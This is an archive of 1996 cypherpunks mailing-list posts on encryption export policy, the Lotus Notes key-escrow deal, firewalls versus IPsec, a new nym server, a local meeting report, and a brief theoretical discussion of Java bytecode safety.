On Mon, 22 Jan 1996, Anonymous User wrote:

> "Private communications between neo-Nazis on the network are
> effected under a program called "Pretty Good Privacy", devised by
> an American neo-Nazi sympathiser."
> 
>   Robin Gedye (in Bonn) p.23 of "The Sunday Telegraph" January 21,
>   1996
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Wed, 24 Jan 1996 22:29:44 +0800
To: cypherpunks@toad.com
Subject: Re: IPSEC == end of firewalls
Message-ID: <9601231159.AA27033@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain



While IP level security & authentication will go a long way to help 
prevent abuses and reduce unauthorized accesses, I doubt if it will
provide enough protection by itself.  While I would love to be proven 
wrong, I believe firewalls are here to stay (at least for the next 
year or two).  A couple of reasons why:

o Node Spoofing will probably still be possible
o The connections will probably also be subject to man-in-the-middle attacks
   (Never underestimate the creativity of people who want to compromise your
   networks)
o Authentication by itself will *not* provide adequate protection against 
   many abuses
o End-to-end encryption by itself won't completely solve the problems either
   (however, it *does* go a long way to prevent man-in-the-middle attacks 
o While IP security & authentication helps to secure the pipe between the 
   two systems which want to communicate with each other, it does not provide
   any security about the applications running over the pipe.  

   (ie - if you and I have a secure pipe between your system and mine & you
have 
   a worm running loose on your network, the only thing the secure pipe will do 
   is ensure that other systems (not in the pipe) won't be damaged as the worm
   propagates out of your network into mine).

   Also.  Which version of sendmail are we up to now?


As far as the future of firewalls goes, I would probably guess that the 
functionality of most firewalls would eventually be an add-on application 
option for Operating Systems and that eventually it will be a standard 
part of every Operating System.  Until then, we have to punt & keep using 
firewalls.  

I suspect even when firewalls are embedded in the O/S, that some type of 
firewall will still be needed to quasi-isolate a company's network from 
the Internet (and establish them as one entity) and to contain potential
networking problems which arise when someone configures their system with 
the wrong IP address (or other type of problem).

IMHO, the first company to include a firewall as a standard part of their
Operating Systems has a real good shot at increasing their market share.  
Perhaps the O/S vendors are paying attention to this list & will implement
this (would be nice).  8^)  Of course, it would also help, if their systems 
were delivered secure - out-of-the-box and we didn't have to spend so much 
time continually locking them down & keeping up with the latest CERT Advisories.
8^)  8^)

Best Regards,


Frank
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Tue, 23 Jan 1996 20:33:52 +0800
To: cypherpunks@toad.com
Subject: NY State to restrinct netporn?!
Message-ID: <199601231227.HAA09534@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


This in today's LI Newsday, p. A6:

Crime Time in Albany
Bills Reflect now popular get-tough stance

by Liam Pleven, Albany Bureau

   Albany - A bill that would restrict sexually explicit material on 
the Internet - which the Assembly took little notice of last year - 
is suddenly headed tothe governor's desk after winning legislative 
approval yesterday.
...

--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 23 Jan 1996 22:06:30 +0800
To: cypherpunks@toad.com
Subject: RC4 for HP48
In-Reply-To: <199601230223.CAA11426@pangaea.hypereality.co.uk>
Message-ID: <9601231353.AA06639@alpha>
MIME-Version: 1.0
Content-Type: text/plain



ECafe Anonymous Remailer writes:
 > 	Here is the RC4 cipher for the HP-48 calculator...

You know, it'd be interesting to start loudly reporting such obvious
ITAR violations.  Not, of course, because I feel myself threatened as
a result of this attack on national security, but because it might
make life more difficult for Them.  When They decide to hassle some
well-chosen target (a la PZ) over such stuff, it'd make for
interesting filler if reporters could add to stories paragraphs like
"...dozens of ITAR violations have been reported in recent months, but
until now officials have taken no action, leading many to believe that
Bob Cypherdude is being singled out for harrassment."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Tue, 23 Jan 1996 22:27:34 +0800
To: cypherpunks@toad.com
Subject: New Nym Server
Message-ID: <8768e3vw4t.fsf@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


The following message is a courtesy copy of an article
that has been posted as well.

Hello Everyone,

	I'm proud to announce the new nym server at nym.alias.net. The
address for the nymserver is:

nymrod@nym.alias.net (Catchy name huh?)

	Anyway nymrod is running Matt Ghio's latest nymserver
code. It's been tested and I think (cross your fingers) all the bugs
have been worked out. It works the same at the nym server at c2.org
and gondonym. If you need a quick tutorial, send email to:

help@nym.alias.net

Enjoy!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Tue, 23 Jan 1996 22:36:09 +0800
To: cypherpunks@toad.com
Subject: Re: New Nym Server at nym.alias.net
Message-ID: <873f97vvm7.fsf@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


The following message is a courtesy copy of an article
that has been posted as well.

Hello Everyone,

[sorry about that last post, I hit send before I was ready. Here it is
with more information.]

	I'm proud to announce the new nym server at nym.alias.net. The
address for the nymserver is:

nymrod@nym.alias.net (Catchy name huh?)

	Anyway nymrod is running Matt Ghio's latest nymserver
code. It's been tested and I think (cross your fingers) all the bugs
have been worked out. It works the same at the nym server at c2.org
and gondonym. If you need a quick tutorial, send email to:

help@nym.alias.net

Here's the PGP public key for nymrod@nym.alias.net:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEEgxQAAAEEAKSv0YzZpc/4Kgn+L9fzzTlCp1LLdSEnu5YnU3AB068XwsF9
rLEn6C7AT8UP0JZAOl/bbhVir5/oCDg93l1iVIdSm3LWis/FXo1r3pVdAFd6PZrl
V/gibZpeAA6sthXRR1OdatuesW11zvs/jee8yUl8rcHfsEbbpE969vAzW/8FAAUR
tDVOeW0gU2VydmVyIGF0IFZpc2hudS5BbGlhcy5OZXQgPG55bXJvZEBueW0uYWxp
YXMubmV0Pg==
=W87x
-----END PGP PUBLIC KEY BLOCK-----

Enjoy!!

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 23 Jan 1996 23:00:30 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <9601231439.AA19088@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter wrote:
> At 20:32 01.17.1996 -0500, Perry E. Metzger wrote:
> >
> >Alan Pugh writes:
> >> infoMCI (sm)
> >> Lotus-Security - Lotus Announces Compromise for Export of Strong
> >> Encryption
> >
> >So, Lotus thinks they can fool people by back-dooring in key escrow, eh?
> >
> >Time to break out the artillery.
> >
> >Perry
> 
> Careful... what would YOU have done, with your customers demanding stronger
> crypto today and you unable to legally give it to them?
> 
> Again, folks, try to remember that this is NOT key escrow... international
> Notes customers are no worse off than before, and a darn sight better off
> against everyone besides Uncle Sam.
> 
> Herb

Not key escrow - WHAT?!?!?  Then, what do you call giving government 
access to 24 out of 64 bits of the key.  This reduces the keyspace
to a measly 40 bits.  As we have seen - 40 bits is trivial to crack 
without a multi-billion dollar budget.  

I think that Lotus did what all corporations do - it thought 
was best for it's bottom line, and so chose the limited keyspace 
with key-escrow approach.  It is our job (as cypherpunks and US citizens)
to show Lotus and the world that this is NOT a good approach.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Tue, 23 Jan 1996 23:15:33 +0800
To: herbs@connobj.com (Herb Sutter)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <2.2.32.19960123140650.00708e08@mail.interlog.com>
Message-ID: <199601231452.IAA19136@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter writes:

>Careful... what would YOU have done, with your customers demanding stronger
>crypto today and you unable to legally give it to them?

Build it overseas where there are no restrictions and then import it. Just
like almost every other component in a computer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Tue, 23 Jan 1996 22:18:40 +0800
To: Adam Shostack <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Blacknet & Lotus Notes
Message-ID: <2.2.32.19960123140645.006ce49c@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 19:13 01.18.1996 -0500, Adam Shostack wrote:
>	So, lets buy the espionage enabling secret key.  Its an
>obvious target, not just for cypherpunks, but for the KGB, Mossad,
>Toshiba, IBM, and anyone else who wants to read their competitors
>correspondance.  Lets face it, this key will get out there, and be
>available to all the big players; lets make it available to everyone!

I think people are missing the point... even if we assume the absolute worst
case, that the private key is broken and becomes publicly available,
international Notes users are no worse off than before.

That said, it shouldn't happen soon.  One of the things Ray said in his
announcement was that the government agreed to both generate and then guard
this key with the same diligence with which they guard their most important
secrets (he specifically mentioned nuclear missile controls).  While it
makes for a nice sound bite, I'm comfortable that there's probably also a
lot of truth to it.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Wed, 24 Jan 1996 15:25:36 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <2.2.32.19960123140650.00708e08@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 20:32 01.17.1996 -0500, Perry E. Metzger wrote:
>
>Alan Pugh writes:
>> infoMCI (sm)
>> Lotus-Security - Lotus Announces Compromise for Export of Strong
>> Encryption
>
>So, Lotus thinks they can fool people by back-dooring in key escrow, eh?
>
>Time to break out the artillery.
>
>Perry

Careful... what would YOU have done, with your customers demanding stronger
crypto today and you unable to legally give it to them?

Again, folks, try to remember that this is NOT key escrow... international
Notes customers are no worse off than before, and a darn sight better off
against everyone besides Uncle Sam.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dwight Brown <stainles@bga.com>
Date: Wed, 24 Jan 1996 00:09:53 +0800
To: cypherpunks@toad.com
Subject: January 22 Infoworld
Message-ID: <199601231528.JAA08958@zoom.bga.com>
MIME-Version: 1.0
Content-Type: text


Nicholas Petreley's "Down To the Wire" column is a short take on the
insecurity of encryption schemes used by most commercial software.
There shouldn't be much new here to cypherpunks (he discusses the
vulnerabilities of WordPerfect, Word for Windows, Excel, and Compuserve's
CIS.INI, and uses some out of date examples "to protect the integrity of
current software": bad move, Nicholas), but it'd make a good introduction
for people who aren't familiar with the issues.

Petreley also announces that InfoWorld is planning a "network-cracking
event", in which they plan to set up various network OS'es, make them as
secure as they can, invite "a small number of accomplished hackers" to
attack them, and publish the results. He says they're looking for
participants...

InfoWorld's web site is http://www.infoworld.com. Petreley can be reached at
nicholas_petreley@infoworld.com.

==Dwight




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jan 1996 23:03:35 +0800
To: cypherpunks@toad.com
Subject: Re: PZ a Nazi?
In-Reply-To: <199601230400.UAA29972@infinity.c2.org>
Message-ID: <199601231440.JAA10440@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous User writes:
> "Private communications between neo-Nazis on the network are
> effected under a program called "Pretty Good Privacy", devised by
> an American neo-Nazi sympathiser."

Er, no. Phil is a squishy liberal, actually -- was involved in the
nuclear freeze movement among other things.

I'm forwarding the mail you sent to Phil -- he should get in touch
with those guys, probably sue them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 24 Jan 1996 02:33:23 +0800
To: cypherpunks@toad.com
Subject: [local] Report onPortland Cpunks meeting
Message-ID: <2.2.32.19960123175419.008aea90@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The physical Cypherpunks meeting in Portland occured on the 20th of January.
No big name Cypherpunks we involved in the manufacture of this meeting.
(Well, maybe next time...)

It pretty much went like a first meeting...  We had about 11 people or so
attend.  (Hard to tell in a coffee shop if people are attending or just
wondering what the heck is going on.)

The participation from the group was very positive.  Those who did attend
were quite willing to participate.  Those of you who did not show up missed
a good meeting... and free coffee drinks from the Habit.  (The Habit
Internet Cafe was having their one year aniversary and was giving away free
coffe as part of the event.)

Some of the happenings (in no particular order):

Bruce Baugh handed out the information he has been collecting on remailer
timings and mail to new gateways.  The information was pretty useful.  He
had sent out a group of ten messages to each remailer through a nym server.
The results were at odds with the published times.  Certain sites either
dropped large percentages of messages or delivered them about 8-9 days late.
Others which were rated at the bottom of the list on the regular timing list
were the most reliable in Bruce's tests.

Neal McBurnett talked about his Java program that generates statistics on
the PGP "web of trust".  The information he gave was pretty surprising.
(Fewer keys exist in the keyservers than I believed.) I encoraged Neal to
post his findings to the list. (Hint! Hint!)  I will not try to explain the
stats from memory...

I gave a report on the status of the PGP 3.0 API.  (Of which Derek Atkins
was kind enough to send me for the meeting.  Thanks Derek!)

There was a key signing.  It was a bit rough as for many of us it was our
first key signing.  (I think Neal was the only person who had been to an
organized key signing.)  Still, it went fairly well.  Only a couple of
people brought their key fingerprints on disk instead of paper.  As of
today, I have only recieved signed keys back from a couple of people
though...  The next key signing will be done a bit differently.  (Live and
learn.)  There was also a suggestion for a nym signing at some point.

There was a discussion of entropy which devolved into entropy. The
definitions of entropy varied widely depending on the background of the
individuals involved.  (Or just general smartassedness...  My definition of
entropy was "A urilogical condition".)

There was alot of just general discussion of crypto and current events.  A
good time was had by all.  (At least I have not had any complaints.)

One of the other topics discussed was a Portland-Cypherpunks mailing list
for keeping people informed on local activities.  This will probibly be put
into place sometime soon...  There will also be upcoming meetings as I have
had a number of people inquiring about the posibility.

Well, that is about all I can remember at this point...  (At least with not
enough caffiene in me.)

Others who were there can probibly comment.
  
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 24 Jan 1996 01:24:45 +0800
To: herbs@connobj.com (Herb Sutter)
Subject: Re: Blacknet & Lotus Notes
In-Reply-To: <2.2.32.19960123140645.006ce49c@mail.interlog.com>
Message-ID: <199601231607.KAA01940@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> I think people are missing the point... even if we assume the absolute worst
> case, that the private key is broken and becomes publicly available,
> international Notes users are no worse off than before.

This sentiment is why this is such a clever move on the part of the 
government.

There are a number of problems with the Lotus plan.

First of all, 40 bits isn't secure.  That's what international users have,
not 64 bits, and it's just not good enough.  International Notes 
customers know it, we know it, Lotus knows it, and the government knows 
it.

Second of all, any restriction on algorithms and key lengths is
unacceptable.  People and businesses have the right to protect their
privacy.  American software companies have to be able to deliver privacy
if they want to remain competitive in the global market.  It's essential 
that the government acknowledge these facts.

Finally, this agreement sets a very dangerous precdent.  The government is
holding keys and compelling people to "trust" them.  This is real, live 
gak.  You're right -- in a sense no one's any worse off than they would 
be with 40 bit keys.  But in another sense, there's a slippery slope 
problem here.  Gak is absolutely unacceptable in any way, shape, or 
form.  It's completely beyond the scope of what the government ought to 
be doing.  If we sit by idly while they set up the comparatively 
toothless gak, it will make things that much easier for them when more 
ambitious gaks come down the pike.

We need to do whatever we can to convince international customers that 
Notes isn't secure.  And we need to make Lotus understand why this deal 
isn't in anyone's interest.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Jan 1996 10:22:34 +0800
To: cypherpunks@toad.com
Subject: KDM_tsu
Message-ID: <199601231507.KAA11540@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Cypherpunks is featured in a story in The New Yorker of
   January 29 on the Mitnick/Shimomura books by Littman and
   Markoff.

   The writer, Robert Wright, terms cpunks "an amorphous group
   that gets its name from its militant devotion to the
   widesrpead use of encryption." He refers to the comments
   here about Mitnick/Shimomura.

   More generally, Wright compares the two books, muses on
   career-boosting and Big Brother purposes of the media's
   melodramatic build-up of Mitnick and Shimomura, and
   outlines what might be done about Internet insecurity:

   1. Police -- by legislation for officials to monitor
      cyberspace.

   2. Privatize -- by IPs policing their own turf.

   3. Encrypt -- like cypherpunks.

   He comments on PRZ's case, notes possible infowar-type
   threats and closes:

      Given that federal officials who would constrain
      encryption seem to be swimming against the nearly
      inexorable tide of technological history, these are the
      [cyber-terrorism] kinds of scenarios they have to
      conjure up to justify their efforts. And these scenarios
      aren't entirely implausible. As cyberspace expands, we
      may see reasons to try to give the government the sort
      of power it seeks here. But those reasons won't look
      much like Kevin Mitnick.


   KDM_tsu









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 23 Jan 1996 23:44:00 +0800
To: herbs@connobj.com (Herb Sutter)
Subject: Re: Blacknet & Lotus Notes
In-Reply-To: <2.2.32.19960123140645.006ce49c@mail.interlog.com>
Message-ID: <199601231510.KAA01291@homeport.org>
MIME-Version: 1.0
Content-Type: text


Herb Sutter wrote:
| At 19:13 01.18.1996 -0500, Adam Shostack wrote:
| >	So, lets buy the espionage enabling secret key.  Its an
| >obvious target, not just for cypherpunks, but for the KGB, Mossad,
| >Toshiba, IBM, and anyone else who wants to read their competitors
| >correspondance.  Lets face it, this key will get out there, and be
| >available to all the big players; lets make it available to everyone!
| 
| I think people are missing the point... even if we assume the absolute worst
| case, that the private key is broken and becomes publicly available,
| international Notes users are no worse off than before.

	I don't give a damn about 'international Notes' users; they're
(IMHO) screwed coming and going.  What I do care about is the ability
of American firms to compete with secure products in the international
market.

	That, fundamentally, is what the ITARs are about.  The US
Government removing the ability of American firms to compete becuase
of some idiotic notion that no one else can implement DES, 3des or
IDEA.  Can IBM/Lotus compete with Intranets now being created, based
on HTTP with 128 bit rc4, or IDEA encryption?  Theres a large body of
evidence that people are dumping Notes for the Web; the lack of
security in notes could well be a part of that.  It can't help.  These
regulations cost American business up to $60billion per year.  Those
businesses are no worse off after sending hundereds of people to
Washington to tell the Department of Commerce and NIST that they need
the ITARs changed.  They're not much better off either.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 00:12:52 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601231159.AA27033@su1.in.net>
Message-ID: <199601231530.KAA10525@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Frank Willoughby writes:
> While IP level security & authentication will go a long way to help 
> prevent abuses and reduce unauthorized accesses, I doubt if it will
> provide enough protection by itself.

I agree with this, but...

> o Node Spoofing will probably still be possible

Nope. It won't.

> o The connections will probably also be subject to man-in-the-middle attacks
>    (Never underestimate the creativity of people who want to compromise your
>    networks)

No, they won't be subject to such attacks any longer.

The real problem, as you noted, is that our applications aren't very
secure.

> I suspect even when firewalls are embedded in the O/S,

That would be somewhat meaningless. The point of a firewall, as others
here have noted, is that it is easier to secure one machine than five
hundred or ten thousand.

> IMHO, the first company to include a firewall as a standard part of their
> Operating Systems has a real good shot at increasing their market share.  

Again, somewhat meaningless, as a real firewall involves defense in
depth (screening routers, a bastion proxy host, etc) and is more of a
configuration issue than an O.S. issue.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Wed, 24 Jan 1996 03:17:29 +0800
To: cypherpunks@toad.com
Subject: Mykotronx sells 68,000 Fortezza cards to Spyrus
Message-ID: <9600238224.AA822422018@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here is a press release from Mykotronix about a big
order of Fortezza cards for the Defense Messaging System.
        Another part of the government has selected Fisher
International to supply SmartDisk cryptographic cards for
the use of citizens interacting with the IRS and other agencies
electronically.  Although Fisher has not received a big order
yet, they are looking at 100 thousand and 10 million card
production runs.  The Fisher card is based on RSA's crypto
toolkit and DOES NOT include skipjack or escrow.
                --Bob


______________________________ Forward Header __________________________________
Subject: Mykotronx sells 68,000 Fortezza cards for Defense Msg System

    IRVINE, Calif.--(BUSINESS WIRE)--Jan. 22, 1996--Rainbow  Technologies
Inc. (NASDAQ:RNBO), Monday announced its Mykotronx  division has received a 
purchase order from Spyrus for over 68,000  of Mykotronx's new Capstone 
encryption processor (MYK-82). 

    The devices will be used to build part of the Government's order  of
Fortezza Cryptographic Cards for the Defense Message System (DMS)  awarded 
Sept. 1995.  Initial delivery of the new cryptographic  processor will begin 
April 1996. 

    "The significance of the MYK-82 is that it allows us to provide  a high
grade, low cost encryption technology to customers, such as  Spyrus," said 
John Droge, vice president of program development for  Mykotronx.  "The 
MYK-82 is an advanced encryption processor  specifically aimed at PCMCIA 
cryptographic applications and has a  built-in PCMCIA interface.  The newer 
design is smaller, faster and  has a lower cost than its predecessor."  In 
addition, Mykotronx will  be programming all the cryptographic processors to 
fill the  Government's Sept. 1995 order of 300,000 Fortezza Cryptographic
 Cards. 

    The MYK-82, developed by Mykotronx and fabricated by VLSI  Technology
Inc., is the first of a series of security products to be  developed as part 
of an alliance with VLSI, targeting both  Government and commercial markets. 

    Rainbow Technologies, founded in 1984, is the world's leading  developer,
manufacturer and supplier of software protection products  and encryption 
technology.  Mykotronx, a subsidiary of Rainbow, is a  leader in secure 
communication and cryptographic products for U.S.  government agencies and 
the commercial marketplace.  Rainbow was  recently recognized by Forbes 
magazine as one of The Best Small  Companies in America and in SmartMoney 
Magazine as one of the Seven  Stocks for the Next Decade.  Rainbow is ISO 
9002 certified.  


CONTACT:  

Rainbow Technologies Inc., Irvine, Calif. 

Ann Jones, 714/450-7350 

email: ajones@rnbo.com 

WWW Home Page: http://www.rnbo.com 

KEYWORD: CALIFORNIA 

INDUSTRY KEYWORD:  COMPUTERS/ELECTRONICS  COMED  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 00:38:07 +0800
To: Herb Sutter <herbs@connobj.com>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <2.2.32.19960123140650.00708e08@mail.interlog.com>
Message-ID: <199601231539.KAA10548@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Herb Sutter writes:
> >So, Lotus thinks they can fool people by back-dooring in key escrow, eh?
> >
> >Time to break out the artillery.
> 
> Careful... what would YOU have done, with your customers demanding stronger
> crypto today and you unable to legally give it to them?

Set up development shop overseas for the crypto plug-ins.

The solution is obvious and easy.

By the way, I really think Netscape should simply ship Jeff and other
people to the Amsterdam office or wherever else seems reasonable and
do all the crypto work from there. It will save trouble and
hassle. U.S. citizens wanting full 128 bit over the net would then get
it from Netscape's overseas download sites. No one anywhere in the
world would be forced to use crap.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 24 Jan 1996 01:22:23 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <9601231548.AB19479@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 22 Jan 1996, Jean-Francois Avon wrote (quote may be only partial)::
>
>> 
>> I suppose, from the adress, that it is some type of mailing list.
>> 
>> If yes, could anybody send me the "how to subscribe" file?
>> 

My mail quoted above was sent out to all subscribers to the list.
I supposed it was only the administrative address....

I got *a lot* of replies.

Thank to all cypherpunk!

JFA

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jan 1996 04:46:37 +0800
To: Scott Staedeli <scottst@ionet.net>
Subject: Re: The Collapse of Ideas in a Pop Culture
In-Reply-To: <199601230805.CAA03513@ion1.ionet.net>
Message-ID: <Pine.SOL.3.91.960123104536.8403B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Scott Staedeli wrote:

> 
>    I _am_ a GEnXer, and I worshipped Jules Bergmann as a child. Some
> of my first memories is pressing my nose up to the tv, watching Saturn
> V's lifting off. If I ever win the lottery, I'm going to take the Saturn that's 

Bollocks. If you can remember Saturn Vs taking off before reruns, you're 
too old! 

Simon (27th July 1969, nearly called Neil)

ob crypto:
	Remember the discussion about using a Sega Saturn as a crypto 
	box? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Wed, 24 Jan 1996 01:33:49 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601231159.AA27033@su1.in.net>
Message-ID: <Pine.SOL.3.91.960123105209.19188B-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


> functionality of most firewalls would eventually be an add-on application 
> option for Operating Systems and that eventually it will be a standard 
> part of every Operating System.  Until then, we have to punt & keep using 
> firewalls.  

I'm not so convinced that adding 'firewall functionality' to an OS is 
such a good idea.  The idea behind having a firewall is that 
	*	You have a hardened host that has been stripped of
		anything that could be used by an attacker to compromise
		other systems
	*	You have a single machine that serves as the sole port of
		entry into your domain.  By keeping your defense perimeter
		nice and small it makes it manageable to maintain.  

When you start trying to swtich firewall functionality to an OS you lose 
both these advantages.  You no longer have a system that is stripped of 
compilers, scripting languages, etc, and you now have a much larger 
security perimeter.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed        Finger samman@suned.cs.yale.edu for key
Want to hire a soon-to-be college grad? 		Mail me for resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gback@facility.cs.utah.edu
Date: Wed, 24 Jan 1996 02:33:42 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: Hack Java
In-Reply-To: <9601231630.AA07540@sulphur.osf.org>
Message-ID: <199601231756.KAA03101@sal.cs.utah.edu>
MIME-Version: 1.0
Content-Type: text


> 
> This illustrates the difference between a language with no dangerous
> constructs, and one where you must trust the implementation.
> >From some internal OSF email:
> ---------- Begin Forwarded Message ----------
> 
> class Data { // an object storing 16 bytes 
> 	byte word[16];
> }
> 
> 
> class Trick {
> 	Data data;
> 	long tricky_pointer;
> 	}
> 
> 
> Now suppose, I fake a compiler (or I have a malicious compiler)
> and I generate by hand malicious byte code such that
> in the symbol tables, tricky_pointer and data have the same
> offset.
> 

 What offset do you mean? The offset in the struct as in C++?
Java bytecode does not store such information. Fields are
accessed using putfield/getfield, which use an index to a
field reference in the constant pool. (pg. 66, lang spec)

Field references contain a name index (pg. 19) which points
to a name, i.e., a CONSTANT_Utf8 (pg. 18) field.

To my knowledge, the Java, and Java bytecode does not imply
any memory layout. I doubt it makes sense to demand to check
that 'offset do not overlap in memory'.

Could you describe in more detail the manipulation you are
proposing?

 - Godmar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 24 Jan 1996 07:07:59 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601231539.KAA10548@jekyll.piermont.com>
Message-ID: <199601231700.LAA02072@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> By the way, I really think Netscape should simply ship Jeff and other
> people to the Amsterdam office or wherever else seems reasonable and
> do all the crypto work from there. It will save trouble and
> hassle. U.S. citizens wanting full 128 bit over the net would then get
> it from Netscape's overseas download sites. No one anywhere in the
> world would be forced to use crap.

I've wondered why they don't do this as well.  For people around the world
in general, it would be a very good thing.  But what kind of an effect
would it have on this country?  What if they decide it's easier to fire
Jeff and hire some Dutch guy instead?  Would the government decide that
the export ban was pointless and lift it?  Or would they stand by as big
chunks of our software industry are lost to foreign competitors? 

Remember this is the government we're talking about, the people who 
destroyed a villiage in order to save it.

